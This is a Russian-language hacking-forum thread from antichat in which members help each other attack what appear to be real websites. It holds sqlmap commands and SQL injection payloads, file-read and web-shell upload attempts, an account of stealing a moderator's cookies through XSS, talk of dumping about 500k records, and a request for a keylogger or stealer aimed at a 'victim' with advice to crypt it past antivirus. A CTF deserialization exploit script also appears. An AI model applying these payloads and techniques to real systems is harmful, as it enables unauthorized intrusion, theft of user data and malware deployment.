Привет, sqlmap очень медленно делает дамп, (~ 1 символ за минуту). Может можно как-нибудь ускорить?

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: name=&password=" AND (SELECT * FROM (SELECT(SLEEP(5)))MCPI) AND "cNZX" LIKE "cNZX

[18:18:57] [ERROR] invalid character detected. retrying..

[18:24:18] [ERROR] invalid character detected. retrying..

[18:25:57] [ERROR] invalid character detected. retrying..

[18:27:36] [ERROR] invalid character detected. retrying..

[18:29:15] [ERROR] invalid character detected. retrying..

[18:30:55] [ERROR] unable to properly validate last character value ('ч')..

weleor said:
↑ (https://antichat.live/posts/4031222/)
Привет, sqlmap очень медленно делает дамп, (~ 1 символ за минуту). Может можно как-нибудь ускорить?
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=&password=" AND (SELECT * FROM (SELECT(SLEEP(5)))MCPI) AND "cNZX" LIKE "cNZX
[18:18:57] [ERROR] invalid character detected. retrying..
[18:24:18] [ERROR] invalid character detected. retrying..
[18:25:57] [ERROR] invalid character detected. retrying..
[18:27:36] [ERROR] invalid character detected. retrying..
[18:29:15] [ERROR] invalid character detected. retrying..
[18:30:55] [ERROR] unable to properly validate last character value ('ч')..


--thread 10

Собственно вернусь к вопросу который задавал чуть более года назад.

.SpoilerTarget" type="button">Spoiler: Вообщем суть вопроса в кратце изложена тут
Ребят) вопрос такой вообщем есть фича на сайте типо добления в blacklist мембера например который тебе не приятен) суть не в этом)

Когда добовляешь мембера в блэк вылазит поле для ввода коментария ( ну мол потом когда заходишь на его страницу виден этот коментарий только тебе )

Суть вопроса в том, вообщем я заметил что в это поле отлично вставляется html код и он работает .)

Есть ли возможность что то придумать через html ...

Сорри за идиотский вопрос 200 лет уже не занимался ничем подобным)) все позабыл)

Вообщем опишу все что попробовал.

Пробовал просто вписать php код вида , по итогу получал в исходном коде собственно это говорит о том что присутствует некий фильтр на phpinfo(); по итогу естественно phpinfo не выводится а в исходном коде остается лишь

Далее хотел попробовать XSS

Зная на 100% что админ не видит коментарий который я добавляю для пользователя хотел все таки забить на xss.

Забить хотел не только по этой причине, а по причине еще что там как бы если я ввел логин пасс и вошел на сайт. Все отлично, пользуюсь функционалом . Как только у меня меняется IP, Сразу же выбрасывает из учетки и приходится логинится заново. Собственно это говорит от том что даже если я возьму активные куки админа и подставлю их вместо своих, то меня в любом случае сразу же выбросит из аккаунта.

И все же я решил попробовать, тестировал не на админе а на модераторе.

Через XSS достал его куки, подставил вместо своих и как и ожидалось, меня сразу же выбрасило из аккаунта.

-

Вообщем хотелось бы услышать дельных советов что можно попробовать в данном случае, за ранее очень благодарен.

http://5shkolainozemcevo.ru/481167987' это скуля и как она крутиться? (После перехода надо опять подставить " ' ")

Ребят,привет. Как можно использовать уязвимость SSLv2 DROWN, всё перечекал не чего толкового не нашёл

Подскажите нубу)) если при таком запросе id=30+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from +mysql.user-- ничего не выводиться(цифр нетб без mysql.user есть ), что то можно придумать?

brand29 said:
↑ (https://antichat.live/posts/4034225/)
Ребят,привет. Как можно использовать уязвимость SSLv2 DROWN, всё перечекал не чего толкового не нашёл


описание атаки https://drownattack.com/drown-attack-paper.pdf , готовую реализацию как правило к подобным вещам в паблик не выкладывают

"Исследователям удалось восстановить TLS-сессию клиента в течение 8 часов, используя 200 машин Amazon EC2: 150 типа g2.2xlarge c nVidia GPU, и 50 g2.8xlarge с 4 nVidia GPU. Стоимость такой атаки составила $440." возможно она так и осталась в массах теоретической)


dorosh88 said:
↑ (https://antichat.live/posts/4034462/)
Подскажите нубу)) если при таком запросе id=30+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from +mysql.user-- ничего не выводиться(цифр нетб без mysql.user есть ), что то можно придумать?


значит у текущего mysql юзера нет доступа к mysql.user, что правильно

придумать можно много чего, начиная от XSSQLi и заканчивая заливкой произвольного файла на сервер

t0ma5 said:
↑ (https://antichat.live/posts/4034522/)
описание атаки
https://drownattack.com/drown-attack-paper.pdf
, готовую реализацию как правило к подобным вещам в паблик не выкладывают
"Исследователям удалось восстановить TLS-сессию клиента в течение 8 часов, используя 200 машин Amazon EC2: 150 типа g2.2xlarge c nVidia GPU, и 50 g2.8xlarge с 4 nVidia GPU. Стоимость такой атаки составила $440." возможно она так и осталась в массах теоретической)
значит у текущего mysql юзера нет доступа к mysql.user, что правильно
придумать можно много чего, начиная от XSSQLi и заканчивая заливкой произвольного файла на сервер


бля найс кек "Уязвимость позволяет восстанавливать master secret побайтово, совершая всего 1920 запросов к серверу для восстановления 128-битного ключа.

Атака настолько вычислительно простая, что ее возможно совершить на обычном компьютере за минуту."

https://habrahabr.ru/company/dsec/blog/278335/

brand29 said:
↑ (https://antichat.live/posts/4034532/)
бля найс кек "Уязвимость позволяет восстанавливать master secret побайтово, совершая всего 1920 запросов к серверу для восстановления 128-битного ключа.
Атака настолько вычислительно простая, что ее возможно совершить на обычном компьютере за минуту."
https://habrahabr.ru/company/dsec/blog/278335/


ты скопировал часть статьи, абзац называется "частный drown", я не понял зачем

t0ma5 said:
↑ (https://antichat.live/posts/4034553/)
ты скопировал часть статьи, абзац называется "частный drown", я не понял зачем


С развращением

t0ma5 said:
↑ (https://antichat.live/posts/4034522/)
значит у текущего mysql юзера нет доступа к mysql.user, что правильно
придумать можно много чего, начиная от XSSQLi и заканчивая заливкой произвольного файла на сервер


t0ma5, прошу помочь в понимании, получается я просмотреть file_priv -> Y или N я не смогу у текущего или у (user()) -> +where+user='tykva', следовательно и залить shell тоже не получиться?? или?

t0ma5 said:
↑ (https://antichat.live/posts/4034553/)
ты скопировал часть статьи, абзац называется "частный drown", я не понял зачем


эта разве не та уязвимость что и у меня ?

dorosh88 said:
↑ (https://antichat.live/posts/4034599/)
t0ma5, прошу помочь в понимании, получается я просмотреть file_priv -> Y или N я не смогу у текущего или у (user()) -> +where+user='tykva', следовательно и залить shell тоже не получиться?? или?


Как ты по русски спросил. Сделай проще. select load_file('/etc/passwd') если прочитал , значит всё гуд. Если нет, тогда нету прав.

BabaDook said:
↑ (https://antichat.live/posts/4034602/)
Как ты по русски спросил. Сделай проще. select load_file('/etc/passwd') если прочитал , значит всё гуд. Если нет, тогда нету прав.


Тут же требуется подобрать в load_file('/etc/passwd') ../../ правильно? в результате ничего не показало) но при этом поля вывода инфы(циферки) не исчезли, вернее только одно поле в которое вставлял, это может свидетельствовать о том что есть права?

dorosh88 said:
↑ (https://antichat.live/posts/4034610/)
Тут же требуется подобрать в load_file('/etc/passwd') ../../ правильно? в результате ничего не показало) но при этом поля вывода инфы(циферки) не исчезли, вернее только одно поле в которое вставлял, это может свидетельствовать о том что есть права?


Боюсь увы, прав нету.

dorosh88 said:
↑ (https://antichat.live/posts/4034610/)
Тут же требуется подобрать в load_file('/etc/passwd') ../../ правильно?


не правильно, смотрите иногда в документацию http://dev.mysql.com/doc/refman/5.7/en/string-functions.html#function_load-file

brand29 said:
↑ (https://antichat.live/posts/4034600/)
эта разве не та уязвимость что и у меня ?


та, но это её частный случай, если верить хабру, лучше все же прочитать оф доки, линк на них я скидывал

Здрасте, есть такая идея. Возможно ли как то получить код на ок ру который отправляется при востановлении на телефон? ведь когда жмешь подтвердить код сравнение кодов идет может можно получить его хотя бы в зашифрованном виде а там уже проще будет что то придумать...

t0ma5 said:
↑ (https://antichat.live/posts/4034629/)
та, но это её частный случай, если верить хабру, лучше все же прочитать оф доки, линк на них я скидывал


время приключений с переводчиком

t0ma5 said:
↑ (https://antichat.live/posts/4034628/)
не правильно, смотрите иногда в документацию
http://dev.mysql.com/doc/refman/5.7/en/string-functions.html#function_load-file


Вроде разобрался спс, но возникает другой вопрос из 6 сайтов проверенных, доступа к mysql.user ни у кого не оказалась, получается найти сервак с такой брешью практически не возможно??? и если это факт есть еще возможность заливки файлов через sql-inj??

dorosh88 said:
↑ (https://antichat.live/posts/4034892/)
Вроде разобрался спс, но возникает другой вопрос из 6 сайтов проверенных, доступа к mysql.user ни у кого не оказалась, получается найти сервак с такой брешью практически не возможно??? и если это факт есть еще возможность заливки файлов через sql-inj??


Найти можно, не сказать что это очень часто бывает, но не эксклюзив. Без прав возможности залить шел нету

BabaDook said:
↑ (https://antichat.live/posts/4034898/)
Найти можно, не сказать что это очень часто бывает, но не эксклюзив. Без прав возможности залить шел нету


Ребят извините за назойливость, просто хочу поставить точки в своих нубских вопросах)) в общем вопрос с shell закрыт, вопрос 2й если есть доступ в админку, заливка только картинок, опять же пробы заливать с расш. *.php.jpg не проходят, и вписывать код в картинку (hexeditor) тоже не выходит, есть еще возможность обойти защиту?

dorosh88 said:
↑ (https://antichat.live/posts/4034905/)
Ребят извините за назойливость, просто хочу поставить точки в своих нубских вопросах)) в общем вопрос с shell закрыт, вопрос 2й если есть доступ в админку, заливка только картинок, опять же пробы заливать с расш. *.php.jpg не проходят, и вписывать код в картинку (hexeditor) тоже не выходит, есть еще возможность обойти защиту?


зависит от того как построена защита, механизмы защиты обычно определяются эмпирическим путём честно говоря у меня у самого пробелы по этому вектору, он такой древний, хотя и актуальный

не картинкой единой, осмотритесь в админке, возможны инклуды например, или code injection в конфиг сайта

Первый раз с postgresql. CMS не знаю какая .

В поле логин и пароль если поставить кавычку(при наличии других символов кроме самой кавычки) вылезает такая ошибка :

.SpoilerTarget" type="button">Spoiler
Warning: pg_query(): Query failed: ERROR: column "int" does not exist LINE 2: ...d > 0 and access > 1 and login='1' and(1)=convert(int,@@vers... ^ in /home/www/ftp*****/data/www/******.***/adm/welcome.php on line 12

Извините, база данных временно недоступна.( [-sct-] )

SaNDER said:
↑ (https://antichat.live/posts/4035079/)
Первый раз с postgresql. CMS не знаю какая .
В поле логин и пароль если поставить кавычку(при наличии других символов кроме самой кавычки) вылезает такая ошибка :
Spoiler
Warning
: pg_query(): Query failed: ERROR: column "int" does not exist LINE 2: ...d > 0 and access > 1 and login='1' and(1)=convert(int,@@vers... ^ in
/home/www/ftp*****/data/www/******.***/adm/welcome.php
on line
12
Извините, база данных временно недоступна.( [-sct-] )


эм

convert(int

заменить на

convert('int'

?

из доков функция convert ждет первым параметром сам текст, без кавычек соответственно он ищет такую колонку в таблице

а зачем там такой треш с конвертом?

прохожу один квест, такая ситуацию, опишу абстрактно

отправляю на сервере строку "1", скрипт на сервере падает и в ошибке я вижу что "1" превратилось в строку "H"

то есть происходит какое то преобразование xor или что то около того, попробовал методом тыка подобрать - не вышло

возможно кому то известны утилиты которые могут определить/прогнать по списку различных преобразований и задетектить какой алгоритм используется?

t0ma5 said:
↑ (https://antichat.live/posts/4035090/)
прохожу один квест, такая ситуацию, опишу абстрактно
отправляю на сервере строку "1", скрипт на сервере падает и в ошибке я вижу что "1" превратилось в строку "H"
то есть происходит какое то преобразование xor или что то около того, попробовал методом тыка подобрать - не вышло
возможно кому то известны утилиты которые могут определить/прогнать по списку различных преобразований и задетектить какой алгоритм используется?


разобрался

теперь другое, как то нужно в файл формата docx запихнуть php код(плейнтекстом, чтобы потом проинклудить), с тем учетом что docx по сути архив и на сервере файл валидируется что это именно docx.. никак не выходит

t0ma5 said:
↑ (https://antichat.live/posts/4035112/)
разобрался
теперь другое, как то нужно в файл формата docx запихнуть php код(плейнтекстом, чтобы потом проинклудить), с тем учетом что docx по сути архив и на сервере файл валидируется что это именно docx.. никак не выходит


попробуй echo '' >> doc.docx

crlf said:
↑ (https://antichat.live/posts/4035290/)
попробуй
echo '' >> doc.docx


пробовал, структура документа рушится, не пропускает в итоге валидатор на сервере..

-------------

пробовал открывать docx как архив и кидать туда файл с именем [B]

[QUOTE="t0ma5"]
t0ma5 said:
↑ (https://antichat.live/posts/4035309/)
пробовал, структура документа рушится, не пропускает в итоге валидатор на сервере..
-------------
пробовал открывать docx как архив и кидать туда файл с именем


.SpoilerTarget" type="button">Spoiler
http://dl3.joxi.net/drive/2017/01/12/0015/0405/1012117/17/7a7d90f1fd.png


И в хекс редакторе комментарий будет в чистом виде


.SpoilerTarget" type="button">Spoiler
http://dl4.joxi.net/drive/2017/01/12/0015/0405/1012117/17/f7adc94ad5.png

BabaDook said:
↑ (https://antichat.live/posts/4035323/)
РингЗеро?


да


Shubka75 said:
↑ (https://antichat.live/posts/4035331/)
Через винрар открой docx, и в комментарии допиши


.SpoilerTarget" type="button">Spoiler
http://dl3.joxi.net/drive/2017/01/12/0015/0405/1012117/17/7a7d90f1fd.png

И в хекс редакторе комментарий будет в чистом виде

.SpoilerTarget" type="button">Spoiler
http://dl4.joxi.net/drive/2017/01/12/0015/0405/1012117/17/f7adc94ad5.png



вот я тупой, спасибо, получилось

помогите советом, в какую сторону копать

есть фреймворк, сессия хранится в виде объекта -> серилизуется -> отправляется в куки

при обращении соответственно сессия восстанавливается из куков обратным процессом

сорцы есть(доступны по линку в конце поста), но никак не могу понять... флаг находится просто в переменной -_- (файл all.php), судя по тому что таск висит на отдельной виртуалке там явно есть выполнение команд

есть такой код


Code:
switch ($type) {
case 'function': return $this->realObject->$target();
case 'property': return $this->realObject->$target;

default:
$debug->show("Unknown property type $type.");
}

пробовал template injection в type - не прокатило.. голову уже сломал

линк кому интересно

http://ctf:ctf2015@ringzer0team.com:10001/

--------------------------------

кажется нащупал, есть некая функция в классе дебага Debug.class.php


Code:
public function showNice($obj) {
Debug::show(var_dump($obj));
}

может быть её можно вызвать и передать ей нужную переменную с флагом..

t0ma5 said:
↑ (https://antichat.live/posts/4036757/)
помогите советом, в какую сторону копать
http://ctf:ctf2015@ringzer0team.com:10001/
--------------------------------
кажется нащупал, есть некая функция в классе дебага Debug.class.php

Code:
public function showNice($obj) {
Debug::show(var_dump($obj));
}

может быть её можно вызвать и передать ей нужную переменную с флагом..


Это крутой таск. Убился об него, вспоминать не хочется.

Даже не знаю, как дать подсказку.

1) Пользовательские данные в unserialize.

2) В GenericMapper (class GenericMapper implements ArrayAccess) можно к объекту обращаться, как к массиву и через map можно обратиться к произвольной функции или свойству объектов.

3) в $type загнать флаг (Debug->getDebugState)

4) и вывести в $debug->show("Unknown property type $type.")

Это не полная цепочка, только направление.

Удачи и терпения.

Уязвимость ли это?

На сайте *****.**/download.php?id=******&name="в этом параметре"

набираю что угодно : например "blablalolo" и качает [*****.**]_blablalolo размеро 17,8 кб .

Расширение файла неизвестно и чем открывать его тоже неизвестно .

Мб я скачал download.php,токо толку от него?

SaNDER said:
↑ (https://antichat.live/posts/4037020/)
Уязвимость ли это?
На сайте *****.**/download.php?id=******&name="в этом параметре"
набираю что угодно : например "blablalolo" и качает [*****.**]_blablalolo размеро 17,8 кб .
Расширение файла неизвестно и чем открывать его тоже неизвестно .
Мб я скачал download.php,токо толку от него?


Попробуй

/etc/passwd

WallHack said:
↑ (https://antichat.live/posts/4037040/)
Папробуй
/etc/passwd


Я такое пробовал,но как я понял он качает файл download.php,меняется лишь название?

Дак вот .

Я открыл с помощью Word'а . Там всякие кракозябры,в конце тоже что-то есть,но не придал этому значение,зато вначале есть что-то :

http://*****.**/announce.php?passkey=тут какой-то хэш из 35 символов .

При переходе выдаёт это :

d14:failure reason24:Invalid info_hash (0 - )e

SaNDER said:
↑ (https://antichat.live/posts/4037047/)
Я такое пробовал,но как я понял он качает файл download.php,меняется лишь название?
Дак вот .
Я открыл с помощью Word'а . Там всякие кракозябры,в конце тоже что-то есть,но не придал этому значение,зато вначале есть что-то :
http://*****.**/announce.php?passkey=тут
какой-то хэш из 35 символов .
При переходе выдаёт это :
d14:failure reason24:Invalid info_hash (0 - )e


Ну... Если бы он качал download.php, там был бы php код

dooble said:
↑ (https://antichat.live/posts/4036951/)
Это
крутой
таск. Убился об него, вспоминать не хочется.
Даже не знаю, как дать подсказку.
1) Пользовательские данные в unserialize.
2) В GenericMapper (class GenericMapper implements ArrayAccess) можно к объекту обращаться, как к массиву и через map можно обратиться к произвольной функции или свойству объектов.
3) в $type загнать флаг (Debug->getDebugState)
4) и вывести в $debug->show("Unknown property type $type.")
Это не полная цепочка, только направление.
Удачи и терпения.


спасибо за подсказку

ненависть к создателю ArrayAccess переполняет моё сердце понимаю почему такое не хочется вспоминать

вопрос:

как я понял это скуля


Code:
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-510,10' at line 1

вызывается с помощью подстановки "-1" в пагинатор.

Как раскрутить? sqlmap хватает 403ю и завершает работу

foozzione said:
↑ (https://antichat.live/posts/4037940/)
вопрос:
как я понял это скуля

Code:
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-510,10' at line 1

вызывается с помощью подстановки "-1" в пагинатор.
Как раскрутить? sqlmap хватает 403ю и завершает работу


sqlmap что выдает? sqlmap.py -u "URL" ............. -v 5

Посмотри в каких случаях выкидывает 403, смотри что фильтруется

kacergei said:
↑ (https://antichat.live/posts/4037981/)
sqlmap что выдает? sqlmap.py -u "URL" ............. -v 5
Посмотри в каких случаях выкидывает 403, смотри что фильтруется


Сейчас буду пробовать

t0ma5 said:
↑ (https://antichat.live/posts/4037152/)
спасибо за подсказку
ненависть к создателю ArrayAccess переполняет моё сердце
понимаю почему такое не хочется вспоминать


Затянуло меня это задание, второй день копаюсь Но скила не хватает, правильно ли я понимаю, что главная фишка в поведении ArrayAccess?

crlf said:
↑ (https://antichat.live/posts/4037993/)
Затянуло меня это задание, второй день копаюсь
Но скила не хватает, правильно ли я понимаю, что главная фишка в поведении ArrayAccess?


не то слово, я пару дней спать нормально не могу.. забрался далеко, но не достаточно(

всё верно, фишка в ArrayAccess, маппер, который в конструкторе класса User


Code:
public function __construct() {
parent::__construct($this, array(
'id' => array('type' => 'function', 'target' => 'id'),
'name' => array('type' => 'function', 'target' => 'name')
));
}

определяет какая функцию этого класса будет вызвана, причем передавать параметры в вызов мы не можем, ибо вызов у нас один в файле demo.php


Code:
$name = $user->name; // Getting the current user name

маппер передаётся сериализованным от клиента, другими словами мы можем подделать вызов функции на нужную переопределив вызываемый класс, он хранится в GenericMapper( который отнаследован от ArrayAccess ) $this->realObject

чего я смог добиться... отправляю класс User и класс Debug

в дебаг классе переопределяю переменную debugStateName с _DEBUG на flag, затем вызываю через модифицированный маппер функцию debugStateName( которая в debug классе )


Code:
public function getDebugState() {
return $GLOBALS[$this->debugStateName];
}

в итоге мы получаем в $name флаг


Code:
$name = $user->name; // Getting the current user name

но подвох в том что $name нигде не выводится

конечно мы можем вызвать showNice или show из дебаг класса, но вызов то подменить мы можем только один..

в общем я пока сам в тупике, могу скинуть рабочую версию скрипта, если нужно, который прокидывает в $name флаг

не могу понять где просчитался, что то упустил, в общем скрипт в спойлере если что

.SpoilerTarget" type="button">Spoiler


Code:
добавил var_dump в своей копии

$ cat demo.php | grep -B 3 var_dump
// Pull request are welcome.

$name = $user->name; // Getting the current user name
var_dump($name);

$ grep -rn flag all.php
10:$flag = 'FLAG-XXXXXXXXXXXX'; // Place your precious flag here !

сам скрипт

#!/usr/bin/perl

use strict;
use warnings;
use MIME::Base64;

my $str = '
O:7:"Session":4:{
s:2:"id";s:13:"587e46015cc88";
s:5:"debug";O:5:"Debug":1:{s:21:"QQQDebugQQQdebugStateName";s:4:"flag";}
s:4:"user";O:4:"User":5:{
s:10:"QQQUserQQQname";s:4:"zzzz";
s:8:"QQQUserQQQid";s:2:"qq";
s:24:"QQQGenericMapperQQQtempValue";s:8:"showNice";
s:18:"QQQGenericMapperQQQmap";a:3:{
s:2:"id";a:2:{s:4:"type";s:8:"function";s:6:"target";s:2:"id";}
s:4:"name";a:2:{s:4:"type";s:8:"function";s:6:"target";s:13:"getDebugState";}
s:13:"getDebugState";a:2:{s:4:"type";s:8:"function";s:6:"target";s:13:"getDebugState";}
}
s:25:"QQQGenericMapperQQQrealObject";r:3;

}
s:4:"data";a:0:{}

}
';

$str =~s/[\s\n]//g;
$str =~s/QQQ/\0/g;
$str = encode_base64($str,'');
$str =~s/=/%3D/g;
$str =~s/\+/%2B/g;
unless($str=~/[a-zA-Z0-9\%]+/)
{ print "hmmm\n$str\n";exit;}

#print "curl -s -k 'http://ringzer0team.com:10001/demo.php' -H 'Cookie: rop_session=$str' -H 'Authorization: Basic Y3RmOmN0ZjIwMTU='\n";
print "curl -s -k 'http://my-site-name.ru/demo.php' -H 'Cookie: rop_session=$str'\n";

вызов

~/quest$ perl rop2.pl | /bin/bash | grep FLAG
string(17) "FLAG-XXXXXXXXXXXX"

t0ma5 said:
↑ (https://antichat.live/posts/4037996/)
в общем я пока сам в тупике, могу скинуть рабочую версию скрипта, если нужно, который прокидывает в $name флаг


Я точно в таком же положении От безнадёги перешёл в режим рандома, пока безрезультатно.

Обратил внимание ещё на один момент, switch идёт без break-ов, если $type = 0;, в функции __set отработют оба кейса 'function' и 'property'. Пока не пойму имеет ли это какое либо отношение к цепочке.

Таск действительно крутой, будем думать дальше

crlf said:
↑ (https://antichat.live/posts/4038003/)
switch
идёт без
break
-ов, если $type = 0;, в функции
__set
отработют оба кейса 'function' и 'property'.


да ладно! ёмана это оно

попробую с этим похимичить

-------------------

хотя __set непонятно как вызвать..

kacergei said:
↑ (https://antichat.live/posts/4037981/)
sqlmap что выдает? sqlmap.py -u "URL" ............. -v 5
Посмотри в каких случаях выкидывает 403, смотри что фильтруется


там cloudflare стоит, который новых юзеров держит 5 секунд перед заходом на сайт, есть решение?

t0ma5 said:
↑ (https://antichat.live/posts/4038006/)
хотя __set непонятно как вызвать..


У меня в тестовом скрипте жёсткая каша, хрен разберёшь Побыстрому накидал небольшой скрипт для вызова __get/__set,надеюсь разберёшься:

.SpoilerTarget" type="button">Spoiler


PHP:
map=$map;
$this->realObject=$realObject;
}

public function__set($name,$value) { }

public function__get($name) { }

public functionoffsetExists($name) {
return isset($this->map[$name]);
}

public functionoffsetUnset($name) {
throw newException('Not supported !') ;
}

public functionoffsetSet($name,$value) {
return$this->__set($name,$value);
}

public functionoffsetGet($name) {
return$this->__get($name);
}
}
classDebug{
private$debugStateName='flag';
private$_instance='ccc';
}
classUserextendsGenericMapper{

private$name='aaa';
private$id='bbb';

public function__construct($realObj ect,$map) {
parent::__construct($realObject,$map);
}
}
classSession{ }
$o= newSession;
$o->user= newUser(newDebug, array('name'=> array('type'=>'function','target'=>'showNice')));
echo"\n__get:\n".urlencode(base64_encode(serialize($o)))."\n";
$o= newUser(newDebug, array('user'=> array('type'=>'function','target'=>'showNice')));
echo"\n__set:\n".urlencode(base64_encode(serialize($o)))."\n";
?>

вопрос: Есть скуля, в пост запросе, вызываю


Code:
./sqlmap.py --url "http://site.ru/" --data "input1=admin@admin.ru" --random-agent --dbms=mysql

но sqlmap ее не находит, что бы раскрутить, если отправляю в ручную, к примеру admin@admin.ru (mailto:admin@admin.ru)' скуля срабатывает.

Есть решения?

foozzione said:
↑ (https://antichat.live/posts/4038116/)
Есть решения?


Попробуй так!

./sqlmap.py -u http://site.ru/ --data="input1=admin@admin.ru (mailto:admin@admin.ru)" --dbs --random-agent --dbms=mysql

ms13 said:
↑ (https://antichat.live/posts/4038119/)
Попробуй так!
./sqlmap.py -u
http://site.ru/
--data
=
"input1=
admin@admin.ru (mailto:admin@admin.ru)
" --dbs --random-agent --dbms=mysql


аналогично

foozzione said:
↑ (https://antichat.live/posts/4038122/)
аналогично


Ага, а что говорит...?

Ты извини, я тут приболел немного - гриппую, и, видимо, от этого мои телепатические способности угасли резко...

./sqlmap.py -u http://site.ru/ --data="input1=admin@admin.ru (mailto:admin@admin.ru)" -p input1 --dbs --level 5 --risk 3 --threads 10 --hex

ms13 said:
↑ (https://antichat.live/posts/4038123/)
Ага, а что говорит...?
Ты извини, я тут приболел немного - гриппую, и, видимо, от этого мои телепатические способности угасли резко...


что то да... потерял я сноровку с задачей нормальных вопросов, сорян )

brown said:
↑ (https://antichat.live/posts/4038165/)
./sqlmap.py -u
http://site.ru/
--data="input1=
admin@admin.ru (mailto:admin@admin.ru)
" -p input1 --dbs --level 5 --risk 3 --threads 10 --hex


как боженька, брагодарность

есть ли возможность в .sql или любой другой формат дампануть себе бд через sqlmap? Пробовал --dump .... но он только выводит все в консоль

foozzione said:
↑ (https://antichat.live/posts/4038324/)
есть ли возможность в .sql или любой другой формат дампануть себе бд через sqlmap? Пробовал --dump .... но он только выводит все в консоль


Ну он всё сохраняет... ты внимательно изучи содержимое консоли после этой процедуры!

ms13 said:
↑ (https://antichat.live/posts/4038331/)
Ну он всё сохраняет... ты внимательно изучи содержимое консоли после этой процедуры!


то есть при отмене дампа, он не сохранит? так как записей довольно много, около 500к, стоит ли ждать ?

foozzione said:
↑ (https://antichat.live/posts/4038334/)
то есть при отмене дампа, он не сохранит? так как записей довольно много, около 500к, стоит ли ждать ?




Code:
--where=DUMPWHERE Use WHERE condition while table dumping
--dump-format=DU.. Format of dumped data (CSV (default), HTML or SQLITE)

t0ma5 said:
↑ (https://antichat.live/posts/4038342/)
.


Та по-моему кто-то морочит голову...

foozzione said:
↑ (https://antichat.live/posts/4038324/)
есть ли возможность в .sql или любой другой формат дампануть себе бд через sqlmap? Пробовал --dump .... но он только выводит все в консоль


--dump-format=HTML --where=С:\

Code:
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: fetch_country=Angola' AND EXTRACTVALUE(5143,CONCAT(0x5c,0x71716a7871,(SELECT (ELT(5143=5143,1))),0x71766a7871))-- MuFD
---
[19:45:19] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.3.3
back-end DBMS: MySQL >= 5.1
[19:45:19] [INFO] fetching tables for database: 'db1084280_bizcsp'
[19:45:22] [WARNING] the SQL query provided does not return any output
[19:45:22] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q]

Пробывал и no-cast и --hex не помгает

brown said:
↑ (https://antichat.live/posts/4038384/)

Code:
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: fetch_country=Angola' AND EXTRACTVALUE(5143,CONCAT(0x5c,0x71716a7871,(SELECT (ELT(5143=5143,1))),0x71766a7871))-- MuFD
---
[19:45:19] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.3.3
back-end DBMS: MySQL >= 5.1
[19:45:19] [INFO] fetching tables for database: 'db1084280_bizcsp'
[19:45:22] [WARNING] the SQL query provided does not return any output
[19:45:22] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q]

Пробывал и no-cast и --hex не помгает


Y

ms13 said:
↑ (https://antichat.live/posts/4038388/)
Y


это понятно что Y ) Почему не хочет определять таблицы,Если перебором то стоит префикс и ничего не находит

brown said:
↑ (https://antichat.live/posts/4038391/)
Почему не хочет определять таблицы




brown said:
↑ (https://antichat.live/posts/4038391/)
стоит префикс и ничего не находит


Это и есть ответ! information_schema ведь отсутствует...

brown said:
↑ (https://antichat.live/posts/4038383/)
--dump-format=HTML --where=С:\


зачем плохому учишь)?

--where это условие для дампа, то есть --where="id

crlf said:
↑ (https://antichat.live/posts/4038101/)
У меня в тестовом скрипте жёсткая каша, хрен разберёшь
Побыстрому накидал небольшой скрипт для вызова
__get/__set,
надеюсь разберёшься:
Spoiler

PHP:
map=$map;
$this->realObject=$realObject;
}

public function__set($name,$value) { }

public function__get($name) { }

public functionoffsetExists($name) {
return isset($this->map[$name]);
}

public functionoffsetUnset($name) {
throw newException('Not supported !') ;
}

public functionoffsetSet($name,$value) {
return$this->__set($name,$value);
}

public functionoffsetGet($name) {
return$this->__get($name);
}
}
classDebug{
private$debugStateName='flag';
private$_instance='ccc';
}
classUserextendsGenericMapper{

private$name='aaa';
private$id='bbb';

public function__construct($realObj ect,$map) {
parent::__construct($realObject,$map);
}
}
classSession{ }
$o= newSession;
$o->user= newUser(newDebug, array('name'=> array('type'=>'function','target'=>'showNice')));
echo"\n__get:\n".urlencode(base64_encode(serialize($o)))."\n";
$o= newUser(newDebug, array('user'=> array('type'=>'function','target'=>'showNice')));
echo"\n__set:\n".urlencode(base64_encode(serialize($o)))."\n";
?>




подебажил

для __set не передается класс Session поэтому отрабатывает это условие


Code:
if (!isset($sess->user)) {
$sess->user = new User();
$sess->save();
}

крут что сказать я не додумался до этого

правда туда всегда передаётся объект User...

честно говоря пока сам в режиме рандома -_-

[QUOTE="t0ma5"]
t0ma5 said:
↑ (https://antichat.live/posts/4038409/)
зачем плохому учишь)?
--where это условие для дампа, то есть --where="id

axe2009 said:
↑ (https://antichat.live/posts/4039110/)
Подскажите кто знает! короче есть уязвимый сайт
вставляю ссылку в havij
и она мне сразу не выписывает список баз а как бы идёт перебор по буквам и только потом выводит название базы
можно ли как то без этого перебора что то сделать? чтоб сразу выводила всё
просто это очень долго ждать
подскажите решение
может через какую то другую тулзу попробовать можно


у тебя там похоже Time-blind начинает раскручивать. Как вариант можно попроовать в sqlmap раскрутить в булеан блайнд , он побыстрее идет ,а может даже и union будет

Нужен кеилогер или стилер вирус чем создать?

Octavian said:
↑ (https://antichat.live/posts/4039237/)
Нужен кеилогер или стилер вирус чем создать?


в паблике ничем, ищи сервисы по криптовке чтобы авир не палил

t0ma5 said:
↑ (https://antichat.live/posts/4038410/)
честно говоря пока сам в режиме рандома -_-


Автор этого задания гений или наркоман со стажем, сложно представить как такое можно выдумать. Я до конца не понял почему это работает, но флаг получил

Gorev said:
↑ (https://antichat.live/posts/4039248/)
в паблике ничем, ищи сервисы по криптовке чтобы авир не палил


Да у жертвы нет антивируса посоветуйте любои

crlf said:
↑ (https://antichat.live/posts/4039255/)
Автор этого задания гений или наркоман со стажем, сложно представить как такое можно выдумать. Я до конца не понял почему это работает, но флаг получил


